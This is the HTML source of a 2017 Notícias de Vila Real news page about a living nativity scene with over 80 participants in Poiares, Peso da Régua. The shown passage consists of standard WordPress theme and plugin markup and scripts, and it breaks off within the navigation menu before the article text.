<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="pt-PT"
 xmlns:fb="http://ogp.me/ns/fb#"> <!--<![endif]-->
<head>
    <title>“Presépio Vivo” recriado por mais de 80 figurantes em Poiares | Notícias de Vila Real</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://www.noticiasdevilareal.com/xmlrpc.php" />
    <meta property="og:image" content="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares.jpg" /><link rel="icon" type="image/png" href="http://noticiasdevilareal.com/wp-content/uploads/2016/03/favicon.ico"><link rel="apple-touch-icon-precomposed" sizes="76x76" href="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg"/><link rel="apple-touch-icon-precomposed" sizes="120x120" href="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg"/><link rel="apple-touch-icon-precomposed" sizes="152x152" href="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg"/><link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg"/><link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg"/><link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Notícias de Vila Real &raquo; Feed" href="http://www.noticiasdevilareal.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Notícias de Vila Real &raquo; Feed de comentários" href="http://www.noticiasdevilareal.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários de Notícias de Vila Real &raquo; “Presépio Vivo” recriado por mais de 80 figurantes em Poiares" href="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.noticiasdevilareal.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.4"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://www.noticiasdevilareal.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9.1' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://www.noticiasdevilareal.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.6.93' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='google-fonts-style-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400%2C400italic%2C600%2C600italic%2C700%7CRoboto%3A300%2C400%2C400italic%2C500%2C500italic%2C700%2C900&#038;ver=8.0' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://www.noticiasdevilareal.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.1.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://www.noticiasdevilareal.com/wp-content/themes/Newspaper/style.css?ver=8.0' type='text/css' media='all' />
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?ver=4.6.93'></script>
<script type='text/javascript' src='http://www.noticiasdevilareal.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.6.93'></script>
<link rel='https://api.w.org/' href='http://www.noticiasdevilareal.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.noticiasdevilareal.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.noticiasdevilareal.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='DGS recomenda vacina contra gripe e hidratação contra o frio' href='http://www.noticiasdevilareal.com/dgs-recomenda-vacina-contra-gripe-e-hidratacao-contra-o-frio/' />
<link rel='next' title='UTAD atribuiu Honoris Causa ao Presidente da Junta da Galiza' href='http://www.noticiasdevilareal.com/utad-atribuiu-honoris-causa-ao-presidente-da-junta-da-galiza/' />
<meta name="generator" content="WordPress 4.8.4" />
<link rel="canonical" href="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" />
<link rel='shortlink' href='http://www.noticiasdevilareal.com/?p=6610' />
<link rel="alternate" type="application/json+oembed" href="http://www.noticiasdevilareal.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.noticiasdevilareal.com%2Fpresepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.noticiasdevilareal.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.noticiasdevilareal.com%2Fpresepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares%2F&#038;format=xml" />
<meta property="fb:app_id" content="511982768990874"/>		<script type="text/javascript">
			jQuery(document).ready(function() {
				// CUSTOM AJAX CONTENT LOADING FUNCTION
				var ajaxRevslider = function(obj) {
				
					// obj.type : Post Type
					// obj.id : ID of Content to Load
					// obj.aspectratio : The Aspect Ratio of the Container / Media
					// obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content
					
					var content = "";

					data = {};
					
					data.action = 'revslider_ajax_call_front';
					data.client_action = 'get_slider_html';
					data.token = '45a5080390';
					data.type = obj.type;
					data.id = obj.id;
					data.aspectratio = obj.aspectratio;
					
					// SYNC AJAX REQUEST
					jQuery.ajax({
						type:"post",
						url:"http://www.noticiasdevilareal.com/wp-admin/admin-ajax.php",
						dataType: 'json',
						data:data,
						async:false,
						success: function(ret, textStatus, XMLHttpRequest) {
							if(ret.success == true)
								content = ret.data;								
						},
						error: function(e) {
							console.log(e);
						}
					});
					
					 // FIRST RETURN THE CONTENT WHEN IT IS LOADED !!
					 return content;						 
				};
				
				// CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER
				var ajaxRemoveRevslider = function(obj) {
					return jQuery(obj.selector+" .rev_slider").revkill();
				};

				// EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION
				var extendessential = setInterval(function() {
					if (jQuery.fn.tpessential != undefined) {
						clearInterval(extendessential);
						if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') {
							jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});   
							// type:  Name of the Post to load via Ajax into the Essential Grid Ajax Container
							// func: the Function Name which is Called once the Item with the Post Type has been clicked
							// killfunc: function to kill in case the Ajax Window going to be removed (before Remove function !
							// openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3)
						}
					}
				},30);
			});
		</script>
		<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.noticiasdevilareal.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]-->
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares" />
<meta property="og:url" content="http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/" />
<meta property="og:description" content="No próximo domingo, poderá visitar o “Presépio Vivo”, recriado no Colégio Salesiano de Poiares, no Peso da Régua, com mais de 80 figurantes que dão vida a cenas bíblicas que antecedem o nascimento …" />
<meta property="article:published_time" content="2017-12-14T14:54:24+00:00" />
<meta property="article:modified_time" content="2017-12-15T14:56:10+00:00" />
<meta property="og:site_name" content="Notícias de Vila Real" />
<meta property="og:image" content="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares.jpg" />
<meta property="og:image:width" content="960" />
<meta property="og:image:height" content="539" />
<meta property="og:locale" content="pt_PT" />
<meta name="twitter:text:title" content="“Presépio Vivo” recriado por mais de 80 figurantes em Poiares" />
<meta name="twitter:image" content="http://www.noticiasdevilareal.com/wp-content/uploads/2017/12/Peso-da-Régua-“Presépio-Vivo”-recriado-por-mais-de-80-figurantes-em-Poiares.jpg?w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
                htmlTag.className += ' td-md-is-iemobile';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .td-animation-stack .entry-thumb, .post img";
var tds_general_modal_image="yes";
var td_ajax_url="http:\/\/www.noticiasdevilareal.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=8.0";
var td_get_template_directory_uri="http:\/\/www.noticiasdevilareal.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="snap";
var tds_logo_on_sticky="show_header_logo";
var tds_header_style="";
var td_please_wait="Por favor espere...";
var td_email_user_pass_incorrect="Usu\u00e1rio ou senha incorretos!";
var td_email_user_incorrect="Email ou nome usu\u00e1rio incorretos!";
var td_email_incorrect="Email incorreto!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Anterior (Seta a esquerda )";
var td_magnific_popup_translation_tNext="Avan\u00e7ar (Seta a direita)";
var td_magnific_popup_translation_tCounter="%curr% de %total%";
var td_magnific_popup_translation_ajax_tError="O conte\u00fado de% url% n\u00e3o p\u00f4de ser carregado.";
var td_magnific_popup_translation_image_tError="A imagem #% curr% n\u00e3o p\u00f4de ser carregada.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>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</style>

<script type="application/ld+json">
                        {
                            "@context": "http://schema.org",
                            "@type": "BreadcrumbList",
                            "itemListElement": [{
                            "@type": "ListItem",
                            "position": 1,
                                "item": {
                                "@type": "WebSite",
                                "@id": "http://www.noticiasdevilareal.com/",
                                "name": "Inicio"                                               
                            }
                        },{
                            "@type": "ListItem",
                            "position": 2,
                                "item": {
                                "@type": "WebPage",
                                "@id": "http://www.noticiasdevilareal.com/category/territorio/",
                                "name": "Território"
                            }
                        },{
                            "@type": "ListItem",
                            "position": 3,
                                "item": {
                                "@type": "WebPage",
                                "@id": "http://www.noticiasdevilareal.com/category/territorio/regiao/",
                                "name": "Região"                                
                            }
                        },{
                            "@type": "ListItem",
                            "position": 4,
                                "item": {
                                "@type": "WebPage",
                                "@id": "http://www.noticiasdevilareal.com/presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares/",
                                "name": "“Presépio Vivo” recriado por mais de 80 figurantes em Poiares"                                
                            }
                        }    ]
                        }
                       </script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>

<body class="post-template-default single single-post postid-6610 single-format-standard presepio-vivo-recriado-por-mais-de-80-figurantes-em-poiares global-block-template-1 wpb-js-composer js-comp-ver-5.1.1 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">

 
        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/Not%C3%ADcias-de-Vila-Real-132527526844208/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/noticiasvreal" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCws8Q_7f6ETlbDjdYMxR8mg" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-menu-home-container"><ul id="menu-menu-home" class="td-mobile-main-menu"><li id="menu-item-54" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-54"><a href="http://www.noticiasdevilareal.com/">Início</a></li>
<li id="menu-item-220" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-220"><a href="http://www.noticiasdevilareal.com/category/sociedade/">Sociedade<i class="td-icon-menu-right td-element-after"></i></a>
<ul  class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/sociedade/cultura/">Cultura</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/sociedade/economia/">Economia</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/sociedade/educacao/">Educação</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/sociedade/religiao/">Religião</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/sociedade/saude/">Saúde</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/sociedade/seguranca/">Segurança</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/sociedade/tradicao/">Tradição</a></li>
</ul>
</li>
<li id="menu-item-184" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-item-184"><a href="http://www.noticiasdevilareal.com/category/territorio/">Território<i class="td-icon-menu-right td-element-after"></i></a>
<ul  class="sub-menu">
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/territorio/fregueisas/">Freguesias</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/territorio/regiao/">Região</a></li>
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/territorio/vila-real/">Vila Real</a></li>
</ul>
</li>
<li id="menu-item-218" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-218"><a href="http://www.noticiasdevilareal.com/category/opiniao/">Opinião</a></li>
<li id="menu-item-219" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-219"><a href="http://www.noticiasdevilareal.com/category/politica/">Política</a></li>
<li id="menu-item-217" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-217"><a href="http://www.noticiasdevilareal.com/category/desporto/">Desporto<i class="td-icon-menu-right td-element-after"></i></a>
<ul  class="sub-menu">
	<li class="menu-item-0"><a href="http://www.noticiasdevilareal.com/category/desporto/corridas-de-vila-real/">Corridas de Vila Real</a></li>
</ul>
</li>
<li id="menu-item-811" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-811"><a href="http://www.noticiasdevilareal.com/category/video/">Vídeos</a></li>
<li id="menu-item-852" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-852"><a href="http://www.noticiasdevilareal.com/assine-ja/">Assine já!</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="http://www.noticiasdevilareal.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Pesquisa</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap" class="td-theme-wrap">
    
        <!--
Header style 1
-->
<div class="td-header-wrap td-header-style-1">

    <div class="td-header-top-menu-full td-container-wrap ">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	        <div class="td_data_time">
            <div >

                Domingo, Dezembro 17, 2017
            </div>
        </div>
    <div class="menu-top-container"><ul id="menu-menu-topo" class="top-header-menu"><li id="menu-item-34" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-34"><a href="http://www.noticiasdevilareal.com/contact/">Contactos</a></li>
<li id="menu-item-674" class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-674"><a href="http://www.noticiasdevilareal.com/category/capas/">Capas</a></li>
<li id="menu-item-3023" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-3023"><a href="http://www.noticiasdevilareal.com/livro-edicoes-nvr/">Livros NVR</a></li>
<li id="menu-item-4493" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-4493"><a href="http://www.noticiasdevilareal.com/publicite-no-jornal-de-vila-real/">Publicidade</a></li>
<li id="menu-item-282" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-282"><a href="http://www.noticiasdevilareal.com/encontre-o-nvr-num-quiosque-perto-de-si/">Onde comprar?</a></li>
</ul></div></div>
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/Not%C3%ADcias-de-Vila-Real-132527526844208/" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/noticiasvreal" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.youtube.com/channel/UCws8Q_7f6ETlbDjdYMxR8mg" title="Youtube">
                <i class="td-icon-font td-icon-youtube"></i>
            </a>
        </span></div>
    </div>

<!-- LOGIN MODAL -->
        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full td-container-wrap ">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                        <a class="td-main-logo" href="http://www.noticiasdevilareal.com/">
            <img class="td-retina-data" data-retina="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" src="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" alt=""/>
            <span class="td-visual-hidden">Notícias de Vila Real</span>
        </a>
                </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    <div class="td-a-rec td-a-rec-id-header  "><div class="td-all-devices"><a href="http://www.noticiasdevilareal.com/assine-ja/"><img src="http://www.noticiasdevilareal.com/wp-content/uploads/2016/03/Assine-já_2.gif"/></a></div></div>
</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full td-container-wrap ">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-header" href="http://www.noticiasdevilareal.com/">
			<img class="td-retina-data" data-retina="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" src="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" alt=""/>
		</a>
			<a class="td-header-logo td-sticky-header" href="http://www.noticiasdevilareal.com/">
			<img class="td-retina-data" data-retina="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" src="http://noticiasdevilareal.com/wp-content/uploads/2016/03/NVR-Logo-300x150.jpg" alt=""/>
		</a>
	    </div>
    <div class="menu-menu-home-container"><ul id="menu-menu-home-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-54"><a href="http://www.noticiasdevilareal.com/">Início</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor td-menu-item td-mega-menu menu-item-220"><a href="http://www.noticiasdevilareal.com/category/sociedade/">Sociedade</a>
<ul  class="sub-menu">
	<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_2_5a35df40a9d95_rand td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="td_uid_2_5a35df40a9d95" ><script>var block_td_uid_2_5a35df40a9d95 = new tdBlock();
block_td_uid_2_5a35df40a9d95.id = "td_uid_2_5a35df40a9d95";
block_td_uid_2_5a35df40a9d95.atts = '{"limit":4,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"6","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"preload","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"Todos","color_preset":"","border_top":"","class":"td_uid_2_5a35df40a9d95_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_2_5a35df40a9d95_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":"","block_template_id":""}';
block_td_uid_2_5a35df40a9d95.td_column_number = "3";
block_td_uid_2_5a35df40a9d95.block_type = "td_block_mega_menu";
block_td_uid_2_5a35df40a9d95.post_count = "4";
block_td_uid_2_5a35df40a9d95.found_posts = "724";
block_td_uid_2_5a35df40a9d95.header_color = "";
block_td_uid_2_5a35df40a9d95.ajax_pagination_infinite_stop = "";
block_td_uid_2_5a35df40a9d95.max_num_pages = "181";
tdBlocksArray.push(block_td_uid_2_5a35df40a9d95);
</script>            <script>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</script>
            <div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="cur-sub-cat mega-menu-sub-cat-td_uid_2_5a35df40a9d95" id="td_uid_3_5a35df40aace7" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="" href="http://www.noticiasdevilareal.com/category/sociedade/">Todos</a><a class="mega-menu-sub-cat-td_uid_2_5a35df40a9d95"  id="td_uid_4_5a35df40aadce" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="7" href="http://www.noticiasdevilareal.com/category/sociedade/cultura/">Cultura</a><a class="mega-menu-sub-cat-td_uid_2_5a35df40a9d95"  id="td_uid_5_5a35df40aaf0b" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="22" href="http://www.noticiasdevilareal.com/category/sociedade/economia/">Economia</a><a class="mega-menu-sub-cat-td_uid_2_5a35df40a9d95"  id="td_uid_6_5a35df40ab050" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="8" href="http://www.noticiasdevilareal.com/category/sociedade/educacao/">Educação</a><a class="mega-menu-sub-cat-td_uid_2_5a35df40a9d95"  id="td_uid_7_5a35df40ab18a" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="40" href="http://www.noticiasdevilareal.com/category/sociedade/religiao/">Religião</a><a class="mega-menu-sub-cat-td_uid_2_5a35df40a9d95"  id="td_uid_8_5a35df40ab2c3" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="21" href="http://www.noticiasdevilareal.com/category/sociedade/saude/">Saúde</a><a class="mega-menu-sub-cat-td_uid_2_5a35df40a9d95"  id="td_uid_9_5a35df40ab408" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="24" href="http://www.noticiasdevilareal.com/category/sociedade/seguranca/">Segurança</a><a class="mega-menu-sub-cat-td_uid_2_5a35df40a9d95"  id="td_uid_10_5a35df40ab541" data-td_block_id="td_uid_2_5a35df40a9d95" data-td_filter_value="10" 